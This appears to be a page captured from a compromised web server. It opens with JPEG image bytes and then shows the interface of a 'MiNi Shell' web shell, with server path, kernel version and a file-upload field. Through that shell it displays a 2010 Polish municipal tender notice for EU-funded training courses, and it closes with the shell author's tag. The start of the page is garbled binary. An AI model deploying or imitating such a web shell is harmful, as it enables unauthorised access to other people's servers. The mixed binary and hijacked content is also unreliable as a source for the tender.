JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100629/187374-N-2010.html

<p class="kh_header"><b>Rogowo: Świadczenie usług szkoleniowych dla 14 osób w ramach projektu Lepsze Jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 187374 - 2010; data zamieszczenia: 29.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , Rogowo 51, 87-515 Rogowo, woj. kujawsko-pomorskie, tel. 054 2801622, faks 054 2802832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.rogowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych dla 14 osób w ramach projektu Lepsze Jutro współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia jest podzielony na dwa etapy (dwie grupy zadaniowe) dotyczy osób i dotyczy bezrobotnych będących klientami Gminnego Ośrodka Pomocy Społecznej w Rogowie:
a)	Grupa objęta kontraktem socjalnym (14 osób)
Przedmiot zamówienia  polega na zorganizowaniu i przeprowadzeniu kursu motywacyjnego podzielonego na dwie części. W skład kursu będą wchodziły spotkania z doradcą zawodowym (18 godz.)(14 osób) oraz trening kompetencji społecznych za udziałem psychologa(60 godz.)(14 osób). 
Przedmiot zamówienia obejmuje również zorganizowanie i przeprowadzenie indywidualnych kursów zawodowych.



Zajęcia grupowe z doradztwa zawodowego i zajęć z psychologiem mają na celu zwiększenie zaufania uczestników projektu we własne siły, rozwój zdolności motywacyjnych, wzrost motywacji i aspiracji zawodowych oraz zwiększenie szansy na wejście na rynek pracy uczestników/uczestniczek projektu. 

Tematyka zajęć powinna uwzględniać:
Zasady redagowania i przygotowywania dokumentów aplikacyjnych - życiorys, list motywacyjny
Rozmowa kwalifikacyjna
Analiza życiowych postaw, niepowodzeń w poszukiwaniu pracy i metod poszukiwania pracy
Komunikacja interpersonalna
Umiejętności negocjacji w oparciu o wzorce asertywne
Techniki kreatywności i kształtowanie osobowości kreatywnej.
Autoprezentacja
Pojęcie rynku pracy

Zajęcia z psychologiem. Tematyka zajęć powinna uwzględniać:
Wzmacnianie poczucia własnej wartości  - system wartości, sztuka autoprezentacji
Złagodzenie psychologicznych skutków bezrobocia i towarzyszących mu problemów, a dalej zmotywowanie do aktywnego poszukiwania pracy
Komunikacja interpersonalna w kształtowaniu wizerunku
Komunikacja werbalna i niewerbalna
Bariery komunikacyjne
Znajomość własnych emocji a efektywne komunikowanie
Stres - na czym polega i jak sobie z nim radzić
Sztuka asertywności
Zaradności osobistej


Kucharz małej gastronomii (246 godz.), (12 osób)
szkolenie powinno obejmować:
-Podstawowe wymagania higieny z systemem HACCP
- Zasady przechowywania produktów spożywczych oraz normy obowiązujące w gospodarce żywnościowej
- Technologia gastronomiczna z towaroznawstwem oraz podstawy zasad żywienia człowieka
- Organizacja produkcji
- Przepisy kulinarne i sporządzanie potraw
- Wyroby garmażeryjne
- Elementy cateringu
 -Seminarium z przerobionego materiału


Szkolenie w zawodzie drwal - pilarz (122 godz.), (3 osoby)
Szkolenie powinno obejmować:
Budowa i działanie silników spalinowych
Budowa pilarek, naprawa i konserwacja
Wibracja i hałas
Charakterystyka pilarek używanych do ścinki i okrzesywania drzew
Paliwa, oleje i smary
Przygotowanie pilarek do pracy, usuwanie usterek, i regulacja 
Narzędzia pomocnicze
Technika ścinki i obalania drzew w warunkach normalnych. Organizacja procesu technologicznego w aspekcie ekspozycji na hałas i wibrację.
Technika ścinki i obalania drzew w warunkach trudnych - organizacja pracy 
Technika okrzesywania drzew ściętych 
Technika przerzynki kłód i dłużyc w aspekcie wykorzystania surowca drzewnego, manipulacja sortymentacja
Technika okrzesywania drzew 
Bezpieczeństwo i higiena pracy - pierwsza pomoc w nagłych wypadkach 
Udzielanie pierwszej pomocy w nagłych wypadkach 
Zadania szczegółowe.
Seminarium z przerobionego materiału. 

Operator zgrzewarek oporowych (85 godz.), (2 osoby)
Szkolenie powinno obejmować:
Podstawowe zagadnienia elektrotechniki 
Natężenie pola elektrycznego
Oporność elektryczna
Napięcie. Różnica potencjałów
Podstawy fizyczne zgrzewania oporowego 
Urządzenia do zgrzewania 
Zgrzewarki oporowe (punktowe, liniowe, garbowe)
Układ zasilania elektrod
Elektrody zgrzewarek oporowych 
Materiały na elektrody
Trwałość elektrod
Technologia zgrzewania oporowego 
Zgrzewania doczołowe
Zgrzewanie punktowe
Zgrzewnie garbowe
Zgrzewanie liniowe
Metody pokrewne zgrzewaniu oporowemu 
Lutozgrzewanie
Niezgodności złączy zgrzewanych oporowo 
Zagrożenia BHP podczas zgrzewania 

Przyuczenie do zawodu szwaczki (136 godz.), (11 osób)
Szkolenie powinno obejmować:
Zdobycie wiedzy i umiejętności niezbędnych do pracy na stanowisku szwaczki.
BHP na stanowisku szwaczki
Rodzaje maszyn - ich konserwacja i obsługa
Materiałoznawstwo: 
- rozpoznawanie różnych rodzajów włókien naturalnych, sztucznych, syntetycznych jak również znajomość ich właściwości
Techniki szwalnicze, metody szycia na maszynie
Zajęcia praktyczne:
- szycie zaszewek, kieszeni, rozporków,
- wszywanie pasków,
- obszywanie mankietów,
- wszywanie guzików i ozdobnych plis,
- obróbka owerlokiem.



Kurs BHP (9 godz.), (14 osób)
Szkolenie powinno obejmować:
Regulacje prawne z zakresu bezpieczeństwa i higieny pracy, z uwzględnieniem przepisów związanych  z wykonywaną pracą 
Zagrożenia czynnikami występującymi w procesach pracy oraz zasad i metody ich likwidacji lub ograniczenia oddziaływania tych czynników na parowników - z uwzględnieniem zmian w technologii, organizacji pracy i stanowisk pracy , stosowania środków ochrony zbiorowej i indywidualnej , wprowadzenia nowych urządzeń, sprzętu i narzędzi pracy. 
Zasady postępowania w razie wypadków w czasie pracy i w sytuacjach zagrożeń (np. pożaru, awarii), w tym zasady udzielania pierwszej pomocy w razie wypadku.
Okoliczności i przyczyny charakterystycznych dla wykonywanej pracy wypadków przy pracy oraz związana z nimi profilaktyka.
aktualne przepisy (z uwzględnieniem zmian), w tym dotyczące: 
obowiązków w zakresie bezpieczeństwa i higieny pracy oraz odpowiedzialności za naruszenie przepisów i zasad bhp
ochrony pracy kobiet i młodocianych
profilaktycznej opieki zdrowotnej nad pracownikami
organizacji nadzoru i kontroli warunków pracy
problemy związane z interpretacją niektórych przepisów


- Wszyscy uczestnicy powinni zostać skierowani przez oferenta na badania lekarskie: oświadczenie lekarskie o braku przeciwwskazań do wykonywania zawodu.
- Zwrot kosztów dojazdu na szkolenia za możliwie najtańszy środek transportu.
- Wszyscy uczestnicy powinni zostać ubezpieczeni od następstw nieszczęśliwych wypadków - NNW- w trakcie trwania, w drodze do i z   miejsca szkolenia
- Konieczność zapewnienia każdego dnia zajęć uczestnikom szkolenia napoi oraz poczęstunku, w tym: kanapki (do 6 godzin szkolenia dziennie) lub lunch (powyżej 6 godzin szkolenia).
- Wykonawca zobowiązuje się do zapewnienia samodzielnego stanowiska praktyki dla każdego z uczestników szkolenia, zapewnienia niezbędnych materiałów, narzędzi, maszyn i produktów koniecznych do prawidłowego przeprowadzenia kursów przygotowania zawodowego.



Poszczególne kursy Wykonawca zrealizuje dla wskazanej przez Zamawiającego liczby uczestników projektu, we wskazanej liczbie godzin oraz zgodnie z ustalonym przez Zamawiającego programem kursów jak powyżej, przy czym Zamawiający zastrzega sobie iż program kursów zaproponowany przez Wykonawcę musi być zbieżny w 80 procentach ze wskazanym powyżej.


Ilekroć w SIWZ mówi się o godzinie lekcyjnej, ma się na myśli jednostkę 45 minutową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do ewidencji szkół i placówek niepublicznych lub akredytacji 
kuratora oświaty. Zamawiający uzna  warunek za spełniony, jeżeli Wykonawca przedstawi kserokopie wpisu do ewidencji szkół i placówek niepublicznych lub akredytację kuratora oświaty.

Posiadanie wpisu do rejestru instytucji szkoleniowych. Zamawiający uzna  warunek za spełniony, jeżeli Wykonawca przedstawi wpis do rejestru instytucji szkoleniowych prowadzonego przez właściwy dla wykonawcy Wojewódzki Urząd Pracy, aktualny na rok 2010</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  warunek za spełniony, jeżeli Wykonawca przedstawi wykaz 2 projektów szkoleniowych o wartości minimum 50 000 złotych, zrealizowanych w ciągu ostatnich 3 lat przed ostatecznym upływem składania oferty, a jeżeli okres prowadzenia przedmiotowej działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, a także daty wykonania oraz dokumentu potwierdzającego, iż projekty szkoleniowe zostały przeprowadzone rzetelnie i prawidłowo ukończone (listy referencyjne itp.)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednią bazą szkoleniową: teoretyczną i praktyczną oraz kadrą posiadającą odpowiednie kwalifikacje. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi wykaz osób (minimum 1 osoba), które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, lub kierowanie szkoleniami, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wiedzy, a także z zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informację na temat zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia.
program szkolenia zgodny z obowiązującymi przepisami; patrz pkt 3 i 13 ppkt
g SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rogowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, Rogowo 51, 87 - 515 Rogowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2010 godzina 09:20, miejsce: Gminny Ośrodek Pomocy Społecznej, Rogowo 51, 87 - 515 Rogowo w pokoju nr 7 (sekretariat) lub przesłać na wyżej podany adres GOPS.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej
w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com